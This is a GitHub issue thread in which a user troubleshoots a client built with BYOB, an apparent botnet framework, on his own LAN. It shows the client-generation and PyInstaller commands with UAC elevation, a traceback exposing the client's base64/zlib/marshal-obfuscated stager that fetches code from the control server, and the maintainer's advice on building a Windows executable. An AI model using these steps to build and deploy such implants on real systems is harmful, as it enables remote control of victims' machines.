### ISSUE TITLE
exe not working

### ISSUE THREAD

**Issue by hexan86** [malwaredllc/byob#59]
I've created a server and a client, after that I've tried to make executable the client with pyinstaller, but for some reason it isn't working.

Here my steps:
Client:
`python ./client.py --name byob --encrypt --compress 192.168.1.8 8186`

Python to Exe:
`pyinstaller -n byob.exe -F -c --uac-admin byob.py
2646 INFO: PyInstaller: 3.3.1
2647 INFO: Python: 2.7.15+
2648 INFO: Platform: Linux-4.1.12-v7-armv7l-with-Kali-kali-rolling-kali-rolling
2650 INFO: wrote /var/www/html/Client_byob/byob.exe.spec
2677 INFO: UPX is available.
2686 INFO: Extending PYTHONPATH with paths
['/var/www/html/Client_byob', '/var/www/html/Client_byob']
2687 INFO: checking Analysis
2688 INFO: Building Analysis because out00-Analysis.toc is non existent
2689 INFO: Initializing module dependency graph...
2705 INFO: Initializing module graph hooks...
3885 INFO: running Analysis out00-Analysis.toc
4005 INFO: Caching module hooks...
4049 INFO: Analyzing /var/www/html/Client_byob/byob.py
32810 INFO: Loading module hooks...
32815 INFO: Loading module hook "hook-httplib.py"...
32818 INFO: Loading module hook "hook-encodings.py"...
39667 INFO: Looking for ctypes DLLs
39668 INFO: Analyzing run-time hooks ...
39749 INFO: Looking for dynamic libraries
40915 INFO: Looking for eggs
40916 INFO: Python library not in binary dependencies. Doing additional searching...
41100 INFO: Using Python library /usr/lib/arm-linux-gnueabihf/libpython2.7.so.1.0
41120 INFO: Warnings written to /var/www/html/Client_byob/build/byob.exe/warnbyob.exe.txt
41329 INFO: Graph cross-reference written to /var/www/html/Client_byob/build/byob.exe/xref-byob.exe.html
41926 INFO: checking PYZ
41927 INFO: Building PYZ because out00-PYZ.toc is non existent
41927 INFO: Building PYZ (ZlibArchive) /var/www/html/Client_byob/build/byob.exe/out00-PYZ.pyz
44536 INFO: Building PYZ (ZlibArchive) /var/www/html/Client_byob/build/byob.exe/out00-PYZ.pyz completed successfully.
45058 INFO: checking PKG
45059 INFO: Building PKG because out00-PKG.toc is non existent
45060 INFO: Building PKG (CArchive) out00-PKG.pkg
53079 INFO: Building PKG (CArchive) out00-PKG.pkg completed successfully.
53165 INFO: Bootloader /usr/local/lib/python2.7/dist-packages/PyInstaller/bootloader/Linux-32bit-arm/run
53166 INFO: checking EXE
53167 INFO: Building EXE because out00-EXE.toc is non existent
53168 INFO: Building EXE from out00-EXE.toc
53169 INFO: Appending archive to ELF section in EXE /var/www/html/Client_byob/dist/byob.exe
53257 INFO: Building EXE from out00-EXE.toc completed successfully.
`
After that, I've started the server and launched byob.exe but "clients" remains empty, no sessions active.
I've launched the client by double-click and after by cmd. In cmd it says :

`C:\Users\Debbie\Downloads>byob.exe
Program too big to fit in memory
C:\Users\Debbie\DOWNLO~1>`

It's all inside the LAN so there aren't firewalls. Both computers are mine, so I'm the admin/root and for every suggestion I've the system permissions. On the Windows machine there isn't event an AV. I use it for this kind of tests.

**Comment by hexan86** [comment]
I really apologize for the previous comment.... it's the Client that is not working. I should have checked first.
When I run "python byob.py" from windows, it comes out with this:
`C:\Users\hexan\Desktop>python byob.py
Traceback (most recent call last):
  File "byob.py", line 2, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmBgYCgtysnJTN
IDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6FlYWhhbm+vrFJYnpqUXF+pkGjnoFleqaekWpiSkamgDL9B
Q6')))))
  File "<string>", line 1, in <module>
  File "C:\Python27\lib\urllib.py", line 87, in urlopen
    return opener.open(url)
  File "C:\Python27\lib\urllib.py", line 213, in open
    return getattr(self, name)(url)
  File "C:\Python27\lib\urllib.py", line 350, in open_http
    h.endheaders(data)
  File "C:\Python27\lib\httplib.py", line 1038, in endheaders
    self._send_output(message_body)
  File "C:\Python27\lib\httplib.py", line 882, in _send_output
    self.send(msg)
  File "C:\Python27\lib\httplib.py", line 844, in send
    self.connect()
  File "C:\Python27\lib\httplib.py", line 821, in connect
    self.timeout, self.source_address)
  File "C:\Python27\lib\socket.py", line 575, in create connecrtion
    raise err
IOError: [Errno socket error] [Errno 10061] Impossible estabilish connection. Persistent refuse from destination computer`

**Comment by malwaredllc** [comment]
I was not able to replicate the issue - I just pushed some bug fixes yesterday so try again with a fresh install and it should work, but let me know if the issue persists.

**Comment by hexan86** [comment]
I can try tomorrow. I've retried one last time some hours ago, running the exe from a CMD with admin rights and it executed without errors, but still no connection and no results in server->clients.
Tomorrow I'll upgrade and retry. I'll let you know :)

**Comment by malwaredllc** [comment]
Sounds good!

Also, I just noticed that it looks like you are trying to generate a binary executable client for Windows (`byob.exe` file) by running PyInstaller on Kali Linux.

Remember that PyInstaller cannot cross-compile for different platforms - running PyInstaller on Kali Linux will generate a ELF binary executable for Linux/UNIX-based systems; running PyInstaller on Windows will generate a PE binary executable for Windows platforms.

**Comment by hexan86** [comment]
Ok, thank you for telling me. I never used pyinstaller before, so I didn't know this particular.
